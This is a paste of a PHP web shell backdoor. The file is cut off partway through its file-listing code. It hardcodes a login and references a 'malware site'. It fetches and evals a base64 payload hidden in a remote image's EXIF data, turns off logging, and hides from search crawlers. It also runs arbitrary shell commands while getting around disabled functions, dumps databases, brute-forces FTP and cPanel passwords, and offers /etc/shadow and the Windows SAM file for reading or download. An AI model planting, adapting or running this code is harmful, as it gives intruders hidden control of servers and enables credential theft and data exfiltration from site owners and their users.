· 7 years ago · Nov 07, 2018, 07:32 PM
1<?php
2// Set Username & Password
3$user = "hex";
4$pass = "hex";
5
6$malsite = "http://fightagent.ru"; // Malware Site
7
8$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
9
10@set_magic_quotes_runtime(0);
11@ini_set('error_log',NULL);
12@ini_set('log_errors',0);
13ob_start();
14error_reporting(0);
15@set_time_limit(0);
16@ini_set('max_execution_time',0);
17@ini_set('output_buffering',0);
18$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
19eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
20if(!empty($_SERVER['HTTP_USER_AGENT']))
21{
22 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
23 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
24 header('HTTP/1.0 404 Not Found');
25 exit; }
26}
27// Dump Database
28if($_GET["action"] == "dumpDB")
29{
30 $self=$_SERVER["PHP_SELF"];
31 if(isset($_COOKIE['dbserver']))
32 {
33 $date = date("Y-m-d");
34 $dbserver = $_COOKIE["dbserver"];
35 $dbuser = $_COOKIE["dbuser"];
36 $dbpass = $_COOKIE["dbpass"];
37 $dbname = $_GET['dbname'];
38 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
39
40 $file = "Dump-$dbname-$date";
41
42 $file="Dump-$dbname-$date.sql";
43 $fp = fopen($file,"w");
44
45 function write($data)
46 {
47 global $fp;
48
49 fwrite($fp,$data);
50
51 }
52 mysql_connect ($dbserver, $dbuser, $dbpass);
53 mysql_select_db($dbname);
54 $tables = mysql_query ("SHOW TABLES");
55 while ($i = mysql_fetch_array($tables))
56 {
57 $i = $i['Tables_in_'.$dbname];
58 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
59 write($create['Create Table'].";");
60 $sql = mysql_query ("SELECT * FROM ".$i);
61 if (mysql_num_rows($sql)) {
62 while ($row = mysql_fetch_row($sql)) {
63 foreach ($row as $j => $k) {
64 $row[$j] = "'".mysql_escape_string($k)."'";
65 }
66 write("INSERT INTO $i VALUES(".implode(",", $row).");");
67 }
68 }
69 }
70
71 fclose ($fp);
72
73 header("Content-Disposition: attachment; filename=" . $file);
74 header("Content-Type: application/download");
75 header("Content-Length: " . filesize($file));
76 flush();
77
78 $fp = fopen($file, "r");
79 while (!feof($fp))
80 {
81 echo fread($fp, 65536);
82 flush();
83 }
84 fclose($fp);
85 }
86}
87function shellstyle()
88{
89 echo "<style type=\"text/css\">
90<!--
91
92body,td,th {
93 color: #FF0000;
94 font-size: 14px;
95}
96input.but {
97 background-color:#000000;
98 color:#FF0000;
99 border : 1px solid #1B1B1B;
100}
101a:link {
102 color: #00FF00;
103 text-decoration:none;
104 font-weight:500;
105}
106a:hover {
107 color:#00FF00;
108 text-decoration:underline;
109}
110font.txt
111{
112 color: #00FF00;
113 text-decoration:none;
114 font-size:14px;
115}
116font.mainmenu
117{
118 color:#FF0000;
119 text-decoration:none;
120 font-size:14px;
121}
122a:visited {
123 color: #006600;
124}
125input.box
126{
127 background-color:#0C0C0C;
128 color: lime;
129 border : 1px solid #1B1B1B;
130 -moz-border-radius:6px;
131 width:400;
132 border-radius:6px;
133}
134input.sbox
135{
136 background-color:#0C0C0C;
137 color: lime;
138 border : 1px solid #1B1B1B;
139 -moz-border-radius:6px;
140 width:180;
141 border-radius:6px;
142}
143select.sbox
144{
145 background-color:#0C0C0C;
146 color: lime;
147 border : 1px solid #1B1B1B;
148 -moz-border-radius:6px;
149 width:180;
150 border-radius:6px;
151}
152select.box
153{
154 background-color:#0C0C0C;
155 color: lime;
156 border : 1px solid #1B1B1B;
157 -moz-border-radius:6px;
158 width:400;
159 border-radius:6px;
160}
161
162textarea.box
163{
164 border : 3px solid #111;
165 background-color:#161616;
166 color : lime;
167 margin-top: 10px;
168 -moz-border-radius:7px;
169 border-radius:7px;
170}
171body {
172 background-color:#000000;
173}
174.myphp table
175{
176 width:100%;
177 padding:18px 10px;
178 border : 1px solid #1B1B1B;
179}
180.myphp td
181{
182 background:#111111;
183 color:#00ff00;
184 padding:6px 8px;
185 border-bottom:1px solid #222222;
186 font-size:14px;
187}
188.myphp th, th
189{
190 background:#181818;
191
192}
193-->
194</style>";
195}
196if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
197{
198 $self=$_SERVER["PHP_SELF"];
199 $os = "N/D";
200 $bdmessage = null;
201 $dir = getcwd();
202
203 if(stristr(php_uname(),"Windows"))
204 {
205 $SEPARATOR = '\\';
206 $os = "Windows";
207 $directorysperator="\\";
208 }
209 else if(stristr(php_uname(),"Linux"))
210 {
211 $os = "Linux";
212 $directorysperator='/';
213 }
214 function Trail($d,$directsperator)
215 {
216 $d=explode($directsperator,$d);
217 array_pop($d);
218 array_pop($d);
219 $str=implode($d,$directsperator);
220 return $str;
221 }
222
223 function ftp_check($host,$user,$pass,$timeout)
224 {
225 $ch = curl_init();
226 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
227 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
228 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
229 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
230 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
231 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
232 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
233 $data = curl_exec($ch);
234 if ( curl_errno($ch) == 28 )
235 {
236 print "<center><b>
237 Error : Connection Timeout.
238 Please Check The Target Hostname .</b></center>";exit;
239 }
240 else if ( curl_errno($ch) == 0 )
241 {
242 print "<center><b>[~]</b><font class=txt>
243 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
244 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
245 }
246 curl_close($ch);
247 }
248
249 function cpanel_check($host,$user,$pass,$timeout)
250 {
251 global $cpanel_port;
252 $ch = curl_init();
253 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
254 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
255 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
256 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
257 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
258 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
259 $data = curl_exec($ch);
260 if ( curl_errno($ch) == 28 )
261 { print "<center><b>Error : Connection Timeout.
262 Please Check The Target Hostname.</b></center>";exit;}
263 else if ( curl_errno($ch) == 0 ){
264 print "<ecnter><b>[~]</b><font class=txt><b>
265
266 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
267 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
268 }
269 curl_close($ch);
270 }
271
272 // Database functions
273 function listdatabase()
274 {
275 $self=$_SERVER["PHP_SELF"];
276 ?>
277 <br>
278 <form>
279 <table>
280 <tr>
281 <td><input type="text" class="box" name="dbname"></td>
282 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
283 </tr>
284 </table>
285 </form>
286 <br>
287 <?php
288 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
289 $result = mysql_query("SHOW DATABASE");
290 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
291
292 $pDB = mysql_list_dbs( $mysqlHandle );
293 $num = mysql_num_rows( $pDB );
294 for( $i = 0; $i < $num; $i++ )
295 {
296 $dbname = mysql_dbname( $pDB, $i );
297 mysql_select_db($dbname,$mysqlHandle);
298 $result = mysql_query("SHOW TABLES");
299 $num_of_tables = mysql_num_rows($result);
300 echo "<tr>\n";
301 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
302 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
303 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
304 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
305 echo "</tr>\n";
306 }
307 echo "</table>\n";
308 mysql_close($mysqlHandle);
309 }
310
311 function listtable()
312 {
313 $self=$_SERVER["PHP_SELF"];
314 $dbserver = $_COOKIE["dbserver"];
315 $dbuser = $_COOKIE["dbuser"];
316 $dbpass = $_COOKIE["dbpass"];
317 $dbname = $_GET['dbname'];
318 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
319 ?>
320 <br><br>
321 <form>
322 <table>
323
324 <tr>
325 <td><input type="text" class="box" name="tablename"></td>
326 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
327 </tr>
328 </table>
329
330 <br>
331 <form>
332 <table>
333 <tr>
334 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
335 </tr>
336 <tr>
337 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
338 </tr>
339 </table>
340 </form>
341
342 <?php
343
344 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
345
346 mysql_select_db($dbname);
347 $pTable = mysql_list_tables( $dbname );
348
349 if( $pTable == 0 ) {
350 $msg = mysql_error();
351 echo "<h3>Error : $msg</h3><p>\n";
352 return;
353 }
354 $num = mysql_num_rows( $pTable );
355
356 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
357
358 for( $i = 0; $i < $num; $i++ )
359 {
360 $tablename = mysql_tablename( $pTable, $i );
361 $result = mysql_query("select * from $tablename");
362 $num_rows = mysql_num_rows($result);
363 echo "<tr>\n";
364 echo "<td>\n";
365 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
366 echo "</td>\n";
367 echo "<td>\n";
368 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
369 echo "</td>\n";
370 echo "<td>\n";
371 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
372 echo "</td>\n";
373 echo "<td>\n";
374 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
375 echo "</td>\n";
376 echo "<td>\n";
377 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
378 echo "</td>\n";
379 echo "</tr>\n";
380 }
381
382 echo "</table></form>";
383 mysql_close($mysqlHandle);
384 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
385 }
386
387
388 function paramexe($n, $v)
389 {
390 $v = trim($v);
391 if($v)
392 {
393 echo '<span><font size=3>' . $n . ': </font></span>';
394 if(strpos($v, "\n") === false)
395 echo '<font size=2>' . $v . '</font><br>';
396 else
397 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
398 }
399 }
400
401
402
403 function rrmdir($dir)
404 {
405 if (is_dir($dir)) // ensures that we actually have a directory
406 {
407 $objects = scandir($dir); // gets all files and folders inside
408 foreach ($objects as $object)
409 {
410 if ($object != '.' && $object != '..')
411 {
412 if (is_dir($dir . '/' . $object))
413 {
414 // if we find a directory, do a recursive call
415 rrmdir($dir . '/' . $object);
416 }
417 else
418 {
419 // if we find a file, simply delete it
420 unlink($dir . '/' . $object);
421 }
422 }
423 }
424 // the original directory is now empty, so delete it
425 rmdir($dir);
426 }
427 }
428
429 function which($pr)
430 {
431 $path = execmd("which $pr");
432 if(!empty($path))
433 return trim($path);
434 else
435 return trim($pr);
436 }
437
438 function magicboom($text)
439 {
440 if (!get_magic_quotes_gpc())
441 return $text;
442 return stripslashes($text);
443 }
444
445function execmd($cmd,$d_functions="None")
446{
447 if($d_functions=="None")
448 {
449 $ret=passthru($cmd);
450 return $ret;
451 }
452 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
453 $d_functions=str_replace(" ","",$d_functions);
454 $dis_funcs=explode(",",$d_functions);
455 foreach($funcs as $safe)
456 {
457 if(!in_array($safe,$dis_funcs))
458 {
459 if($safe=="exec")
460 {
461 $ret=@exec($cmd);
462 $ret=join("\n",$ret);
463 return $ret;
464 }
465 elseif($safe=="system")
466 {
467 $ret=@system($cmd);
468 return $ret;
469 }
470 elseif($safe=="passthru")
471 {
472 $ret=@passthru($cmd);
473 return $ret;
474 }
475 elseif($safe=="shell_exec")
476 {
477 $ret=@shell_exec($cmd);
478 return $ret;
479 }
480 elseif($safe=="popen")
481 {
482 $ret=@popen("$cmd",'r');
483 if(is_resource($ret))
484 {
485 while(@!feof($ret))
486 $read.=@fgets($ret);
487 @pclose($ret);
488 return $read;
489 }
490 return -1;
491 }
492 elseif($safe="proc_open")
493 {
494 $cmdpipe=array(
495 0=>array('pipe','r'),
496 1=>array('pipe','w')
497 );
498 $resource=@proc_open($cmd,$cmdpipe,$pipes);
499 if(@is_resource($resource))
500 {
501 while(@!feof($pipes[1]))
502 $ret.=@fgets($pipes[1]);
503 @fclose($pipes[1]);
504 @proc_close($resource);
505 return $ret;
506 }
507 return -1;
508 }
509 }
510 }
511 return -1;
512}
513
514 function getDisabledFunctions()
515 {
516 if(!ini_get('disable_functions'))
517 {
518 return "None";
519 }
520 else
521 {
522 return @ini_get('disable_functions');
523 }
524 }
525
526 function getFilePermissions($file)
527 {
528 $perms = fileperms($file);
529
530 if (($perms & 0xC000) == 0xC000) {
531 // Socket
532 $info = 's';
533 } elseif (($perms & 0xA000) == 0xA000) {
534 // Symbolic Link
535 $info = 'l';
536 } elseif (($perms & 0x8000) == 0x8000) {
537 // Regular
538 $info = '-';
539 } elseif (($perms & 0x6000) == 0x6000) {
540 // Block special
541 $info = 'b';
542 } elseif (($perms & 0x4000) == 0x4000) {
543 // Directory
544 $info = 'd';
545 } elseif (($perms & 0x2000) == 0x2000) {
546 // Character special
547 $info = 'c';
548 } elseif (($perms & 0x1000) == 0x1000) {
549 // FIFO pipe
550 $info = 'p';
551 } else {
552 // Unknown
553 $info = 'u';
554 }
555
556 // Owner
557 $info .= (($perms & 0x0100) ? 'r' : '-');
558 $info .= (($perms & 0x0080) ? 'w' : '-');
559 $info .= (($perms & 0x0040) ?
560 (($perms & 0x0800) ? 's' : 'x' ) :
561 (($perms & 0x0800) ? 'S' : '-'));
562
563 // Group
564 $info .= (($perms & 0x0020) ? 'r' : '-');
565 $info .= (($perms & 0x0010) ? 'w' : '-');
566 $info .= (($perms & 0x0008) ?
567 (($perms & 0x0400) ? 's' : 'x' ) :
568 (($perms & 0x0400) ? 'S' : '-'));
569
570 // World
571 $info .= (($perms & 0x0004) ? 'r' : '-');
572 $info .= (($perms & 0x0002) ? 'w' : '-');
573 $info .= (($perms & 0x0001) ?
574 (($perms & 0x0200) ? 't' : 'x' ) :
575 (($perms & 0x0200) ? 'T' : '-'));
576
577 return $info;
578}
579 function filepermscolor($filename)
580 {
581 if(!@is_readable($filename))
582 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
583 else if(!@is_writable($filename))
584 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
585 else
586 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
587 }
588
589 function yourip()
590 {
591 echo $_SERVER["REMOTE_ADDR"];
592 }
593 function phpver()
594 {
595 $pv=@phpversion();
596 echo $pv;
597 }
598 function magic_quote()
599 {
600 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
601 }
602 function serverip()
603 {
604 echo getenv('SERVER_ADDR');
605 }
606 function serverport()
607 {
608 echo $_SERVER['SERVER_PORT'];
609 }
610 function safe()
611 {
612 global $sm;
613 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
614 }
615 function serveradmin()
616 {
617 echo $_SERVER['SERVER_ADMIN'];
618 }
619 function systeminfo()
620 {
621 echo php_uname();
622 }
623 function curlinfo()
624 {
625 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
626 }
627 function oracleinfo()
628 {
629 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
630 }
631 function mysqlinfo()
632 {
633 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
634 }
635 function mssqlinfo()
636 {
637 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
638 }
639 function postgresqlinfo()
640 {
641 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
642 }
643 function softwareinfo()
644 {
645 echo getenv("SERVER_SOFTWARE");
646 }
647 function download()
648 {
649 $frd=$_GET['download'];
650 $prd=explode("/",$frd);
651 for($i=0;$i<sizeof($prd);$i++)
652 {
653 $nfd=$prd[$i];
654 }
655 @ob_clean();
656 header("Content-type: application/octet-stream");
657 header("Content-length: ".filesize($nfd));
658 header("Content-disposition: attachment; filename=\"".$nfd."\";");
659 readfile($nfd);
660
661 exit;
662
663 }
664
665 function HumanReadableFilesize($size)
666 {
667 $mod = 1024;
668 $units = explode(' ','B KB MB GB TB PB');
669 for ($i = 0; $size > $mod; $i++)
670 {
671 $size /= $mod;
672 }
673 return round($size, 2) . ' ' . $units[$i];
674 }
675
676 function showDrives()
677 {
678 global $self;
679 foreach(range('A','Z') as $drive)
680 {
681 if(is_dir($drive.':\\'))
682 {
683 $myd = $drive.":\\";
684 ?>
685 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
686 <?php echo $myd; ?>
687 </a>
688 <?php
689 }
690 }
691 }
692 function diskSpace()
693 {
694 return disk_total_space("/");
695 }
696 function freeSpace()
697 {
698 return disk_free_space("/");
699 }
700
701 function thiscmd($p)
702 {
703 $path = myexe('which ' . $p);
704 if(!empty($path))
705 return $path;
706 return false;
707 }
708
709 function mysecinfo()
710 {
711 function myparam($n, $v)
712 {
713 $v = trim($v);
714 if($v)
715 {
716 echo '<span><font color =red size=3>' . $n . ': </font></span>';
717 if(strpos($v, "\n") === false)
718 echo '<font color =lime size=3>' . $v . '</font><br>';
719 else
720 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
721 }
722 }
723
724 myparam('Server software', @getenv('SERVER_SOFTWARE'));
725 if(function_exists('apache_get_modules'))
726 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
727 myparam('Open base dir', @ini_get('open_basedir'));
728 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
729 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
730 $temp=array();
731 if(function_exists('mysql_get_client_info'))
732 $temp[] = "MySql (".mysql_get_client_info().")";
733 if(function_exists('mssql_connect'))
734 $temp[] = "MSSQL";
735 if(function_exists('pg_connect'))
736 $temp[] = "PostgreSQL";
737 if(function_exists('oci_connect'))
738 $temp[] = "Oracle";
739 myparam('Supported databases', implode(', ', $temp));
740 echo '<br>';
741
742 if($GLOBALS['os'] == 'Linux') {
743 myparam('Distro : ', myexe("cat /etc/*-release"));
744 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
745 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
746 myparam('OS version', @file_get_contents('/proc/version'));
747 myparam('Distr name', @file_get_contents('/etc/issue.net'));
748 myparam('Where is Perl?', myexe('whereis perl'));
749 myparam('Where is Python?', myexe('whereis python'));
750 myparam('Where is gcc?', myexe('whereis gcc'));
751 myparam('Where is apache?', myexe('whereis apache'));
752 myparam('CPU?', myexe('cat /proc/cpuinfo'));
753 myparam('RAM', myexe('free -m'));
754 myparam('Mount options', myexe('cat /etc/fstab'));
755 myparam('User Limits', myexe('ulimit -a'));
756
757
758 if(!$GLOBALS['safe_mode']) {
759 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
760 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
761 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
762 echo '<br>';
763 $temp=array();
764 foreach ($userful as $item)
765 if(thiscmd($item))
766 $temp[] = $item;
767 myparam('Userful', implode(', ',$temp));
768 $temp=array();
769 foreach ($danger as $item)
770 if(thiscmd($item))
771 $temp[] = $item;
772 myparam('Danger', implode(', ',$temp));
773 $temp=array();
774 foreach ($downloaders as $item)
775 if(thiscmd($item))
776 $temp[] = $item;
777 myparam('Downloaders', implode(', ',$temp));
778 echo '<br/>';
779 myparam('HDD space', myexe('df -h'));
780 myparam('Hosts', @file_get_contents('/etc/hosts'));
781
782 }
783 } else {
784 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
785 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
786 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
787 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
788 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
789 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
790 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
791 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
792 myparam('OS Version',myexe('ver'));
793 myparam('Account Settings',myexe('net accounts'));
794 myparam('User Accounts',myexe('net user'));
795 }
796 echo '</div>';
797 }
798
799
800
801 function myexe($in)
802 {
803 $out = '';
804 if (function_exists('exec')) {
805 @exec($in,$out);
806 $out = @join("\n",$out);
807 } elseif (function_exists('passthru')) {
808 ob_start();
809 @passthru($in);
810 $out = ob_get_clean();
811 } elseif (function_exists('system')) {
812 ob_start();
813 @system($in);
814 $out = ob_get_clean();
815 } elseif (function_exists('shell_exec')) {
816 $out = shell_exec($in);
817 } elseif (is_resource($f = @popen($in,"r"))) {
818 $out = "";
819 while(!@feof($f))
820 $out .= fread($f,1024);
821 pclose($f);
822 }
823 return $out;
824}
825
826 function exec_all($command)
827 {
828
829 $output = '';
830 if(function_exists('exec'))
831 {
832 exec($command,$output);
833 $output = join("\n",$output);
834 }
835
836 else if(function_exists('shell_exec'))
837 {
838 $output = shell_exec($command);
839 }
840
841 else if(function_exists('popen'))
842 {
843 $handle = popen($command , "r"); // Open the command pipe for reading
844 if(is_resource($handle))
845 {
846 if(function_exists('fread') && function_exists('feof'))
847 {
848 while(!feof($handle))
849 {
850 $output .= fread($handle, 512);
851 }
852 }
853 else if(function_exists('fgets') && function_exists('feof'))
854 {
855 while(!feof($handle))
856 {
857 $output .= fgets($handle,512);
858 }
859
860
861
862 }
863 }
864 pclose($handle);
865 }
866
867
868 else if(function_exists('system'))
869 {
870 ob_start(); //start output buffering
871 system($command);
872 $output = ob_get_contents(); // Get the ouput
873 ob_end_clean(); // Stop output buffering
874 }
875
876 else if(function_exists('passthru'))
877 {
878 ob_start(); //start output buffering
879 passthru($command);
880 $output = ob_get_contents(); // Get the ouput
881 ob_end_clean(); // Stop output buffering
882 }
883
884 else if(function_exists('proc_open'))
885 {
886 $descriptorspec = array(
887 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
888 );
889 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
890 if(is_resource($handle))
891 {
892 if(function_exists('fread') && function_exists('feof'))
893 {
894 while(!feof($pipes[1]))
895 {
896 $output .= fread($pipes[1], 512);
897 }
898 }
899 else if(function_exists('fgets') && function_exists('feof'))
900 {
901 while(!feof($pipes[1]))
902 {
903 $output .= fgets($pipes[1],512);
904 }
905 }
906 }
907 pclose($handle);
908 }
909
910 return(htmlspecialchars($output));
911
912}
913
914$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
915$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
916
917function getOGid($value)
918{
919 if(!function_exists('posix_getegid')) {
920 $user = @get_current_user();
921 $uid = @getmyuid();
922 $gid = @getmygid();
923 $group = "?";
924 $owner = $uid . "/". $gid;
925 return $owner;
926 } else {
927 $name=@posix_getpwuid(@fileowner($value));
928 $group=@posix_getgrgid(@filegroup($value));
929 $owner = $name['name']. " / ". $group['name'];
930 return $owner;
931 }
932}
933
934function mainfun($dir)
935{
936 global $ind, $directorysperator,$os;
937
938 $mydir = basename(dirname(__FILE__));
939 $pdir = str_replace($mydir,"",$dir);
940 $pdir = str_replace("/","",$dir);
941
942 $files = array();
943 $dirs = array();
944
945 $odir=opendir($dir);
946 while($file = readdir($odir))
947 {
948 if(is_dir($dir.'/'.$file))
949 {
950 $dirs[]=$file;
951 }
952 else
953 {
954 $files[]=$file;
955 }
956 }
957 $countfiles = count($dirs) + count($files);
958 $dircount = count($dirs);
959 $dircount = $dircount-2;
960 $myfiles = array_merge($dirs,$files);
961 $i = 0;
962 if(is_dir($dir))
963 {
964 if(scandir($dir) === false)
965 echo "<center><font size=3>Directory isn't readable</font></center>";
966 else
967 {
968?><form method="post" id="myform" name="myform">
969 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
970 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
971 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
972 <tr style="background-color:#0C0C0C; height:12px;">
973 <th>Name</th>
974 <th>Size</th>
975 <th>Permissions</th>
976 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
977 <th>Modification Date</th>
978 <th>Rename</th>
979 <th>Download</th>
980 <th style="width:2%;">Action</th>
981 </tr>
982 <?php
983 foreach($myfiles as $val)
984 {
985 $vv = addslashes($dir . $directorysperator . $val);
986 $i++;
987
988 if($val == ".")
989 {
990
991 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
992 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
993
994 <?php if($os != 'Windows')
995 {
996 echo "<td align=center><font size=2>";
997 echo getOGid($dir)."</font></td>";
998 }
999 ?>
1000
1001 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1002 <td></td><td></td><td></td></</tr><?php
1003
1004 }
1005 else if($val == "..")
1006 {
1007 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1008 $vv = addslashes($val);
1009 if(empty($vv))
1010 $vv = "/"; ?>
1011 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1012 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1013 <?php if($os != 'Windows')
1014 {
1015 echo "<td align=center><font size=2>";
1016 echo getOGid($val)."</font></td>";
1017
1018 } ?>
1019 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1020 <td></td><td></td><td></td></tr><?php continue;
1021 }
1022 else if(is_dir($vv))
1023 {
1024 ?>
1025 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1026 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1027 <td class='info'><font size=2>DIR</font></td>
1028
